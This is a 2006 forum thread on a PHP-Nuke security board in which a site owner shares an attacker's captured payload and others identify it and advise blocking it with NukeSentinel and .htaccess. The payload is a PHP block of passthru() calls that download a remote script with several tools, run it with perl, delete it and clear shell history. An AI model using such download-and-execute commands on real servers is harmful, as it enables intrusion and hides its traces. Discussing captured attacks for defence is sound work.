Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Common NukeSentinel bannings...
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
hireamerica
Client



Joined: Sep 30, 2004
Posts: 103
Location: New Jersey
PostPosted: Mon Oct 16, 2006 10:11 am Reply with quote
I'm seeing a lot of blocks happen (with good reason). The basics are someone tries either author or harvest attack by referring thru another site.

Here's what I get from the other site...anyone have any info?...

<?
passthru('cd /tmp;wget [ Only registered users can see links on this board! Get registered or login! ] al;rm -f al*;history -c');
passthru('cd /tmp;curl [ Only registered users can see links on this board! Get registered or login! ] al;rm -f al*;history -c');
passthru('cd /tmp;lwp-download [ Only registered users can see links on this board! Get registered or login! ] al;rm -f al*;history -c');
passthru('cd /tmp;lynx -source [ Only registered users can see links on this board! Get registered or login! ] >al;perl al;rm -f al*;history -c');
passthru('cd /tmp;fetch [ Only registered users can see links on this board! Get registered or login! ] >al;perl al;rm -f al*;history -c');
passthru('cd /tmp;GET [ Only registered users can see links on this board! Get registered or login! ] >al;perl al;rm -f al*;history -c');
?>

I think you can see the URL in there (yago...)...
 
View user's profile Send private message Visit poster's website Yahoo Messenger
hitwalker
Sells PC To Pay For Divorce



Joined:
Posts: 5661
PostPosted: Mon Oct 16, 2006 11:45 am Reply with quote
well just shots in the dark,trying to get shell access ...lol..see what works....
allready banned all 30 spamming and hacking countries?
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221
PostPosted: Mon Oct 16, 2006 12:26 pm Reply with quote
Yes this is a very active exploiter, using a variety of proxy servers and hosts to attack known vulnerabilities. All of these will be blocked with Sentinel.

I suggest also blocking libwww-perl in .htaccess, there is a recent thread on how to do this.

I keep reporting yagenoysentoplesen.com to their host, but their host keeps changing every 2-3 days.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©